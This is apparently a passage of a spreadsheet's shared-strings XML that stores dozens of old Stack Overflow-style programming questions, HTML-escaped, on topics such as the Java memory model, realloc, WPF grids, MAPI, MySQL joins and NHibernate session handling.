    <t xml:space="preserve">&lt;p&gt;For years and years, I've tried to understand the &lt;a href="http://java.sun.com/docs/books/jls/third_edition/html/memory.html#17.4"&gt;part&lt;/a&gt; of Java specification that deals with memory model and concurrency. I have to admit that I've failed miserably. Yes' I understand about locks and "synchronized" and wait() and notify(). And I can use them just fine, thank you. I even have a vague idea about what "volatile" does. But all of that was not derived from the language spec - rather from general experience.&lt;/p&gt;
&lt;p&gt;Here are two sample questions that I am asking. I am not so much interested in particular answers, as I need to understand how the answers are derived from the spec (or may be how I conclude that the spec has no answer).&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What does "volatile" do, exactly?&lt;/li&gt;
&lt;li&gt;Are writes to variable atomic? Does it depend on variable's type?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How do realloc and memcpy work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Dear all, Here are my questions...&lt;/p&gt;
&lt;p&gt;1- Do realloc and memcpy copy the entries in an array to another in a way faster than just iterating on each element O(N) ? If the answer is yes then what do you think is its complexity ?&lt;/p&gt;
&lt;p&gt;2- If the size allocated is smaller than the original size, does realloc copy the entries to somewhere else or just leave them as they are decreasing the size of the array ?&lt;/p&gt;
&lt;p&gt;Thanks so much.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should an interface that is inherited from base-class be implemented explicitly in subclass?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My question is, if an interface that is implemented implicitly by extending a class that already implements it, should be explicitly implemented by the class, if the class wants to advertise the fact, that it fulfills the contract of that interface. &lt;/p&gt;
&lt;p&gt;For instance, if you want to write a class, that fulfills the contract of the interface &lt;code&gt;java.util.List&lt;/code&gt;. You implement this, extending the class &lt;code&gt;java.util.AbstractList&lt;/code&gt;, that already implements the interface &lt;code&gt;List&lt;/code&gt;. Do you explicitly declare, that you implement List?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MyList extends AbstractList implements List
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or do you save typing by using the implicit way?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MyList extends AbstractList
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which way is considered better style? What reasons do you have to prefer one way or another? In which situations you would prefer way 1 or way 2?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to determine application root directory?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to get all dlls in my application root directory. What is the best way to do that?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string root = Application.StartupPath;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string root = new FileInfo(Assembly.GetExecutingAssembly().Location).FullName;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And after that,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Directory.GetFiles(root, "*.dll");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which way is better? Are there better ways?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MFC AfxParseURL reverse function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there reverse function to MFC AfxParseURL (which creates URL from service type, port and so on)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>circular dependencies between dlls with visual studio</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a circular dependency between two functions. I would like each of these functions to reside in its own dll. Is it possible to build this with visual studio?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foo(int i)
{
   if (i &amp;gt; 0)
      bar(i -i);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;-&gt; should compile into foo.dll&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bar(int i)
{
   if (i &amp;gt; 0)
      foo(i - i);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;-&gt; should compile into bar.dll&lt;/p&gt;
&lt;p&gt;I have created two projects in visual studio, one for foo and one for bar. By playing with the 'References' and compiling a few times, I managed to get the dll's that I want. I would like to know however whether visual studio offers a way to do this in a clean way.&lt;/p&gt;
&lt;p&gt;If foo changes, bar does not need to be recompiled, because I only depend on the signature of bar, not on the implementation of bar. If both dll's have the lib present, I can recompile new functionality into either of the two and the whole system still works.&lt;/p&gt;
&lt;p&gt;The reason I am trying this is that I have a legacy system with circular dependencies, which is currently statically linked. We want to move towards dll's for various reasons. We don't want to wait until we clean up all the circular dependencies. I was thinking about solutions and tried out some things with gcc on linux and there it is possible to do what I suggest. So you can have two shared libraries that depend on each other and can be built independent of each other.&lt;/p&gt;
&lt;p&gt;I know that circular dependencies are not a good thing to have, but that is not the discussion I want to have.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How long before the line of business app in F# becomes the norm?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;With the recent news about F# being included with Visual Studio 2010, I got to thinking ... how soon before I see functional programming take hold in the usual "line of business app" space?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jRails vs. Prototype</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am not trying to make this a preference question, I am really wondering what people's experiences are with using jQuery and Rails or jRails for development.  Most rails users including myself up to now have been using Prototype.  However, I am mixing in a lot of jQuery plugins since they are so easy to use and extend.&lt;/p&gt;
&lt;p&gt;I am now thinking about moving from Prototype to jQuery for a new Rails project.  However, I love the Power of Prototype.  Protoype is almost a new language that sites ontop of JS whereas I find that jQuery is like a great scripting language with lots of syntax sugar and chaining.&lt;/p&gt;
&lt;p&gt;Anyway, your thoughts would be much appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In WPF, how can I determine what column/row in a grid a control is in?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building a grid dynamically and putting buttons in one of the columns.  When I click a button, I want to know what row of my grid it's in.  How can I find this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I set the ideal QPixmapCache::cacheLimit?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have just started using QPixmapCache and I was wondering, since there is not much documentation, about how to adjust the size based on the system the application is running on.&lt;/p&gt;
&lt;p&gt;Some users might have lots of free memory while others have very little.  I have no idea what the best setting would be.  &lt;/p&gt;
&lt;p&gt;What would be the best way to detect the system (free) RAM and adjust the cache size to fit?&lt;/p&gt;
&lt;p&gt;&lt;a href="http://doc.trolltech.com/4.4/qpixmapcache.html#setCacheLimit" rel="nofollow"&gt;http://doc.trolltech.com/4.4/qpixmapcache.html#setCacheLimit&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to avoid XML injection</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have input field value from that is used for forming XPath query.
What symbols in input string should I check to minimise possibility of XML injection?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to sort numbers in a QTreeWidget column?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a QTreeWidget with a column filled with some numbers, how can I sort them?&lt;/p&gt;
&lt;p&gt;If I use setSortingEnabled(true); I can sort correctly only strings, so my column is sorted:&lt;/p&gt;
&lt;p&gt;1
   10
   100
   2
   20
   200&lt;/p&gt;
&lt;p&gt;but this is not the thing I want!
Suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bind an ObjectDataSource to an existing method in my Data access layer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've seen the designer code, and I have seen code which builds the ObjectDataSource in the code-behind, however both methods communicate directly with the database via either text commands or stored procs. This seems like unnecessary code duplication to me since my data access layer has a method already which returns a datatable with the data I need for this report. &lt;/p&gt;
&lt;p&gt;How can I programmatically build and link the ODS to my data access layer's method?&lt;/p&gt;
&lt;p&gt;EDIT: &lt;/p&gt;
&lt;p&gt;Thanks to everyone who answered. This was very poorly phrased on my part. There was too much that I did not understand when I wrote this question originally. What I should have asked is: &lt;/p&gt;
&lt;p&gt;How do I programmatically bind a .Net Reporting Services Report (*.rdlc) to a method in my Data Access Layer instead of an ADO.Net DataSet.&lt;/p&gt;
&lt;p&gt;See my answer below. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Browsing for SQL Servers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a database application that connects to SQL server. I'd like to implement a similar connection dialog box like the one in SQL Management Studio. I've already found a way to get the list of databases on a server, but I'd really like to get the list of available servers on the network so end users won't have to type in the name/IP of the server.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio Web Design</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using visual studio 2005 and have been building asp.net applications.  Mostly just departmental level apps for reporting and data maintenance.  They work and they look ok but they don't look great.   I don't have any other tools like Dreamweaver or Expression.  Can anyone name any books or resources for making better looking web pages in Visual Studio.&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Billy &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I make a Table of Contents frame in XSL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an XML file that I am creating an XSL stylesheet for.&lt;/p&gt;
&lt;p&gt;What I would like is to have two frames and do two passes on the data, the first would create a Table of Contents in the left frame, and the second would have the body of data in the right.&lt;/p&gt;
&lt;p&gt;I can do the two passes, the problem is putting them in separate frames.  The frame HTML element takes in a source; I can't put my source directly in there.&lt;/p&gt;
&lt;p&gt;I can think of a few ways to get around this, none of which I'm thrilled with, so I wanted to see if anyone had found a way to do this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How To Update Data With Linq By Attach Method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a update method in my data layer such this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public clacc datalayerSec_User
private objUIData as new UIData
Public Function Update(ByVal objUser As SEC_USER) As Boolean
  Try
    objUIData.SEC_USERs.Attach(objUser)
    objUIData.Refresh(RefreshMode.KeepCurrentValues, objUser)
    objUIData.SubmitChanges(ConflictMode.ContinueOnConflict)
    Return True
  Catch ex As Exception
    Throw ex
  End Try
End Function
end class
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I write this code to update my data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim tmpUser As New UI_Class.BAL.Security.cls_SEC_USER
Dim tblUser = tmpUser.GetAll.SingleOrDefault(Function(x) x.DS_OPENID = pOpenID)
tblUser.DT_LAST_LOGIN = DateTime.Now
tmpUser.Update(tblUser)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I run it, I have this error message: Cannot attach an entity that already exists.&lt;/p&gt;
&lt;p&gt;How can it be fixed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good way to stretch object over multiple classes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a collection of orders. I would like to hit the database once, retrieve the orders, store them and then be able to access this collection over multiple forms. I know in asp.net, you can use things like Application Object or Session Object but how do you do it in a win form app? I was thinking of creating a static collection that could be accessed through multiple forms, classes, or wherever. Does this sound right and is it even feasible?&lt;/p&gt;
&lt;p&gt;thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>StringBuilder for string concatenation throws OutOfMemoryException</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We mostly tend to following the above best practice.&lt;/p&gt;
&lt;p&gt;Have a look at &lt;a href="http://stackoverflow.com/questions/73883/string-vs-stringbuilder"&gt;String vs StringBuilder&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;But StringBuilder could throw &lt;strong&gt;OutOfMemoryException even when there is sufficient memory available&lt;/strong&gt;.  It throws OOM exception because it needs "continuous block of memory".&lt;/p&gt;
&lt;p&gt;Some links for reference
&lt;a href="http://bytes.com/groups/net-c/501231-stringbuilder-outofmemory"&gt;StringBuilder OutOfMemoryException&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;and there are many more.....&lt;/p&gt;
&lt;p&gt;How many of you faced this problem or aware and what did you do to resolve it?&lt;/p&gt;
&lt;p&gt;Is there anything I am missing?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;P.S: I wasn't aware of this.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I have rephrased the question.&lt;/p&gt;
&lt;p&gt;***  The same thing worked with manual concatenation(I'll verify this and update SO).  The other thing that caused me concern was that there is enough memory in the system.  That's the reason I raised this question here to check whether any one faced this problem or there was something drastically wrong with the code.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where should I store SSIS Data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a slow custom data source in a SSIS Dataa Flow Task.I have to run the package with multiple parameters&lt;/p&gt;
&lt;p&gt;If I want to upload data to a DB using SQL Data Destination(Bulk Insert) the connection times out&lt;/p&gt;
&lt;p&gt;If I write the data to a flat file I cannot run multiple instances of the package, since they will write to the same file. Can I pass the file name as a parameter somewhere?&lt;/p&gt;
&lt;p&gt;Do I need to write a custom Script Destination as the last resort?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>static class instances unique to a request or a server in ASP.NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt; public sealed class UserLoginSingleton
{
     UserLoginCollection _userLoginCol = new UserLoginCollection();
    UserLoginSingleton()
    {
    }
    public static UserLoginSingleton Instance
    {
        get
        {
            IDictionary items = HttpContext.Current.Items;
            if (!items.Contains("TheInstance"))
            {
                items["TheInstance"] = new UserLoginSingleton();
            }
            return items["TheInstance"] as UserLoginSingleton;
        }
    }
    public void CreateUserObj(string xmlData)
    {
        _userLoginCol = (UserLoginCollection)_xmlUtil.Deserialize(xmlData, typeof(UserLoginCollection));
    }
    public UserLoginCollection getUserObj()
    {
        return _userLoginCol;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Usage:&lt;/p&gt;
&lt;p&gt;Page 1.aspx&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;UserLoginSingleton.Instance.CreateUserObj(xml);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Pase2.aspx:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;UserLoginCollection
  userLoginCollection =
  UserLoginSingleton.Instance.getUserObj();&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Followed the article here:
&lt;a href="http://stackoverflow.com/questions/194999/are-static-class-instances-unique-to-a-request-or-a-server-in-aspnet"&gt;link text&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I set my collection object in page 1 and then do a response.redirect or click on link to get me to page 2.aspx. However, my singleton instance has no collection object i set. How do i persist my collection object across diff pages per each session?&lt;/p&gt;
&lt;p&gt;I know static's wont work as every instance will see the object and i want that to specific per each user.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting PartCover to work</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to try PartCover for code coverage. I'm running Visual Studio 2008 Professional with MSTest. The Professional Edition does not include the Team Testing tools, like Code Coverage.&lt;/p&gt;
&lt;p&gt;So, I'm trying PartCover, but I can't get it to work. In the PartCover.Browser I've selected the MSTest executable, I've pointed the working arguments to my tests.dll, and I've tried pointing my Working Directory to the TestResults folder, but I get an error:&lt;/p&gt;
&lt;p&gt;"Report is empty. Check settings and run target again."&lt;/p&gt;
&lt;p&gt;I don't know what to try next.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;It turns out I had two problems. First, I wasn't putting my Rules right. Second, I had spaces in my working arguments. The spaces were giving an error, but not showing up anywhere.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows Explorer directory as bundle</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been investigating for some time now a way to prevent my user from accidently entering a data directory of my application.&lt;/p&gt;
&lt;p&gt;My application uses a folder to store a structured project. The folder internal structure is critic and should not be messed up. I would like my user to see this folder as a whole and not be able to open it (like a Mac bundle).&lt;/p&gt;
&lt;p&gt;Is there a way to do that on Windows?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit from current answers&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Of course I am not trying to prevent my users from accessing their data, just protecting them from accidentally destroying the data integrity. So encryption or password protection are not needed. &lt;/p&gt;
&lt;p&gt;Thank you all for your .Net answers but unfortunately, this is mainly a C++ project without any dependency to the .Net framework.&lt;/p&gt;
&lt;p&gt;The data I am mentioning are not light, they are acquired images from an electronic microscope. These data can be huge (~100 MiB to ~1 GiB) so loading everything in memory is not an option. These are huge images so the storage must provide a way to read the data incrementally by accessing one file at a time without loading the whole archive in memory.&lt;/p&gt;
&lt;p&gt;Besides, the application is mainly legacy with some components we are not even responsible of. A solution that allows me to keep the current IO code is preferable.&lt;/p&gt;
&lt;p&gt;Shell Extension looks interesting, I will investigate the solution further.&lt;/p&gt;
&lt;p&gt;LarryF, can you elaborate on Filter Driver or DefineDOSDevice ? I am not familiar with these concepts.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the name of the component that's extending mine in ColdFusion?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have the following component called &lt;strong&gt;&lt;em&gt;Base&lt;/em&gt;&lt;/strong&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;cfcomponent output="false"&amp;gt;
    &amp;lt;cffunction name="init" access="public" returntype="Any" output="false"&amp;gt;
    	&amp;lt;cfset variables.metadata = getmetadata(this)&amp;gt;
    	&amp;lt;cfreturn this&amp;gt;
    &amp;lt;/cffunction&amp;gt;
    &amp;lt;cffunction name="getmeta" access="public" returntype="Any" output="false"&amp;gt;
    	&amp;lt;cfreturn variables.metadata&amp;gt;
    &amp;lt;/cffunction&amp;gt;
&amp;lt;/cfcomponent&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I want to extend base in another component called &lt;strong&gt;&lt;em&gt;Admin&lt;/em&gt;&lt;/strong&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;cfcomponent output="false" extends="Base"&amp;gt;
&amp;lt;/cfcomponent&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now within my application if I do the following when creating the object:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;cfset obj = createobject("component", "Admin").init()&amp;gt;
&amp;lt;cfdump var="#obj.getmeta()#"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The metadata I get back tells me that the name of the component is &lt;strong&gt;&lt;em&gt;Admin&lt;/em&gt;&lt;/strong&gt; and it's extending my &lt;strong&gt;&lt;em&gt;Base&lt;/em&gt;&lt;/strong&gt; component. That's all good, but I don't want to have to call the &lt;strong&gt;&lt;em&gt;init()&lt;/em&gt;&lt;/strong&gt; method explicitly when creating the object.&lt;/p&gt;
&lt;p&gt;I would be nice if I could do something like this in my &lt;strong&gt;&lt;em&gt;Base&lt;/em&gt;&lt;/strong&gt; component:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;cfcomponent output="false"&amp;gt;
    &amp;lt;cfset init()&amp;gt;
    &amp;lt;cffunction name="init" access="public" returntype="Any" output="false"&amp;gt;
    	&amp;lt;cfset variables.metadata = getmetadata(this)&amp;gt;
    	&amp;lt;cfreturn this&amp;gt;
    &amp;lt;/cffunction&amp;gt;
    &amp;lt;cffunction name="getmeta" access="public" returntype="Any" output="false"&amp;gt;
    	&amp;lt;cfreturn variables.metadata&amp;gt;
    &amp;lt;/cffunction&amp;gt;
&amp;lt;/cfcomponent&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However then the metadata returned by the getmeta() method telling me that the component name is &lt;strong&gt;&lt;em&gt;Base&lt;/em&gt;&lt;/strong&gt; even though it's still being extended. Any thoughts on how to accomplish this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.net: Weird web user control problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is weird. I declare a web user control on a asp.net web page like so&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;print("&amp;lt;%@ Register Src="~/Controls/blah.ascx" TagName="blahCtrl" TagPrefix="cc" %&amp;gt;");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don't have problem with it until today in the code behind where it give me name blah is not declared error. does anyone know what cause this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Approach to convert from org.joda.time.DateTime to java.util.Calendar</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone done this and can share? I see an option or two but want to know what others have accomplished.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Basic: How is the session id created?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does IIS create the session id when a request is received and where is that saved (client or server)?&lt;/p&gt;
&lt;p&gt;How does server recognize that the request is coming from the same user/session?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Running multiple virtual directories on IIS - any performance issues?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to run 8-10 instances of my application on IIS 6.0 that are all identical but point to different backends (handled via config files, which would be different for each virtual directory).  I want to create multiple virtual directories that point to different versions of the app and I want to know if there is any significant performance penalty for this.  The server (Windows Server 2003) is a quad-core with 4 GB of ram and the single install of the app barely touches the CPU or memory, so it doesn't seem to be a concern.  This doesn't seem to justify another server, especially since some of the instances will be very lightly used.  Obviously, performance depends on the server and the application, but are there any concerns with this situation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem with table JOIN in MySQL and aggregation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have three tables. This query will write down the right answer (x-lines for btv.id_user with appropriate btv.cas and race.id_zavod&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT `btv.id_user`, `btv.id_zavod`,`btv.cas`
FROM `btv`
JOIN `btu` ON `btv.id_user` = `btu.id_user`
JOIN `race` ON 'btv.id_zavod' = `race.id_zavod`
WHERE `race.type` = '8' AND `btv.id_user` = '607'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Result:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;| 607 |  512 | 03:15:58 |  
| 607 |  730 | 03:01:18 |  
| 607 |  164 | 03:07:26 |  
| 607 |  767 | 02:58:31 |  
| 607 | 1147 | 03:06:47 |  
| 607 | 1149 | 03:09:41 |  
| 607 | 1178 | 03:24:20 |
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But when I try to aggregate it to one row by the id_user it return correct min btv.cas but wrong join wrong race.id_zavod&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT `btv.id_user`, `btv.id_zavod`, MIN( `btv.cas` )
FROM `btv`
JOIN `btu` ON `btv.id_user` = `btu.id_user`
JOIN `race` ON 'btv.id_zavod' = `race.id_zavod`
WHERE `race.type` = '8' AND `btv.id_user` = '607'
GROUP BY `btv.id_user`
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Result:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;| 607 | 512 | 02:58:31 |
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do YOU reduce compile time, and linking time for Visual C++ projects (native C++)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do YOU reduce compile time, and linking time for VC++ projects (native C++)?&lt;/p&gt;
&lt;p&gt;Please specify if each suggestion applies to debug, release, or both.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Has anyone had success getting PR_DEFAULT_STORE using MAPI under Windows Mobile?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The following piece of test code &lt;em&gt;runs&lt;/em&gt; under Windows Mobile.
It's objective is to seek out the default message store.  This is so that I can get the proper account name for programmatically compiling an email.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IMAPISession *mapiSession;
HRESULT hr = S_OK;
MAPIInitialize (NULL);
IMAPITable *msgTable;
SRowSet *pRows;
IMsgStore *msgStore;
if (MAPILogonEx(0,NULL,NULL,0,&amp;amp;mapiSession) != S_OK)
{
//  MessageBox(g_hWnd,_T("Failed to logon"),_T("Error"),0);
}
else
{
SizedSPropTagArray(3, PropTagArr) = {3,{PR_DISPLAY_NAME, 
                        PR_ENTRYID,
                        PR_DEFAULT_STORE}};
    hr = mapiSession-&amp;gt;GetMsgStoresTable(MAPI_UNICODE,&amp;amp;msgTable);
    hr = msgTable-&amp;gt;SetColumns((LPSPropTagArray)&amp;amp;PropTagArr, 0);
    if (!hr)
    {
        do
        {
            hr = msgTable-&amp;gt;QueryRows(1,0,&amp;amp;pRows);
            LPSPropValue lpProp;
            lpProp = &amp;amp;pRows-&amp;gt;aRow[0].lpProps[0];
//          if(_tcscmp( lpProp-&amp;gt;Value.LPSZ, _T("SMS") ) == 0 )
//              break;
            lpProp = &amp;amp;pRows-&amp;gt;aRow[0].lpProps[0];
            if (lpProp-&amp;gt;ulPropTag == PR_DEFAULT_STORE)
                break;
            lpProp = &amp;amp;pRows-&amp;gt;aRow[0].lpProps[1];
            if (lpProp-&amp;gt;ulPropTag == PR_DEFAULT_STORE)
                break;
            lpProp = &amp;amp;pRows-&amp;gt;aRow[0].lpProps[2];
            if (lpProp-&amp;gt;ulPropTag == PR_DEFAULT_STORE)
                break;
            FreeProws(pRows);
            pRows = NULL;
        }while (!hr);
    hr = mapiSession-&amp;gt;OpenMsgStore (0, 
            pRows-&amp;gt;aRow[0].lpProps[1].Value.bin.cb, 
            (ENTRYID*)pRows-&amp;gt;aRow[0].lpProps[1].Value.bin.lpb, 
            NULL, 
            MDB_NO_DIALOG | MAPI_BEST_ACCESS, 
            &amp;amp;msgStore);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... BUT, fails to get the &lt;strong&gt;&lt;code&gt;PR_DEFAULT_STORE&lt;/code&gt;&lt;/strong&gt; property on a Windows Mobile device.  I'm guessing Microsoft didn't implement it accurately.  And so, &lt;code&gt;lpProp-&amp;gt;ulPropTag&lt;/code&gt; will &lt;strong&gt;never&lt;/strong&gt; &lt;code&gt;== PR_DEFAULT_STORE&lt;/code&gt;.  It's always 0000.&lt;/p&gt;
&lt;p&gt;Which leads me to my question, is there &lt;em&gt;another way&lt;/em&gt; of the determining the default message store?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript XML parser problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;test[_nObjectives].pool[j].feedbackCorrect = oQuestions[j].getElementsByTagName("feedbackCorrect")[0].firstChild.data;&lt;/p&gt;
&lt;p&gt;and the XML in this case contains this: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;feedbackCorrect&amp;gt;
  &amp;lt;/feedbackCorrect&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When executing that line of code the following error occurs: Message: Object required&lt;/p&gt;
&lt;p&gt;I don't get it. The tag is there, if it is empty the error occurs and even has spaces chars it doesn't work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to create a form object from 2 different model objects in Django?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have 2 objects, both from different Model classes, and want to show a form containing some fields from each one. How can I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NHibernate session management in ASP.NET MVC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently playing around with the HybridSessionBuilder class found on Jeffrey Palermo's blog post:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://jeffreypalermo.com/blog/use-this-nhibernate-wrapper-to-keep-your-repository-classes-simple/"&gt;http://jeffreypalermo.com/blog/use-this-nhibernate-wrapper-to-keep-your-repository-classes-simple/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Using this class, my repository looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class UserRepository : IUserRepository
{
    private readonly ISessionBuilder _sessionBuilder;
    public UserRepository(ISessionBuilder sessionBuilder)
    {
        _sessionBuilder = sessionBuilder;
    }
    public User GetByID(string userID)
    {
        using (ISession session = _sessionBuilder.GetSession())
        {
            return session.Get&amp;lt;User&amp;gt;(userID);
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this the best way to go about managing the NHibernate session / factory?  I've heard things about Unit of Work and creating a session per web request and flushing it at the end.  From what I can tell, my current implementation isn't doing any of this.  It is basically relying on the Repository to grab the session from the session factory and use it to run the queries.&lt;/p&gt;
&lt;p&gt;Are there any pitfalls to doing database access this way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>QueryInterface for interface VBA._Collection failed</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are randomly seeing this error during long executions of our system. The error is caught by our alarm system, and we successfully retry, and continue running the system. The only hits we found on Google seem to mention corrupt installations. We do not think this is the case here, since our systems are running, get the error, and can continue running.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>best practices to import text into html</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best practice for importing text into html from a multipage InDesign document, from designer to non-designer. Document designed on a mac going to CMS on PC - hand off the InDesign File or strip text into word file? Supplying all images and pdf as go-by?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>positioning logo and navigation links not aligning</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Screenshot of the problem:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.stack.imgur.com/qutvW.jpg" alt="http://i36.tinypic.com/dfxdmd.jpg"&gt;&lt;/p&gt;
&lt;p&gt;The yellow block is the logo and the blue box is the nav links (I have blanked them out). I would like to align the links at the bottom so they are stuck to the top of the body content (white box). How would I do this?
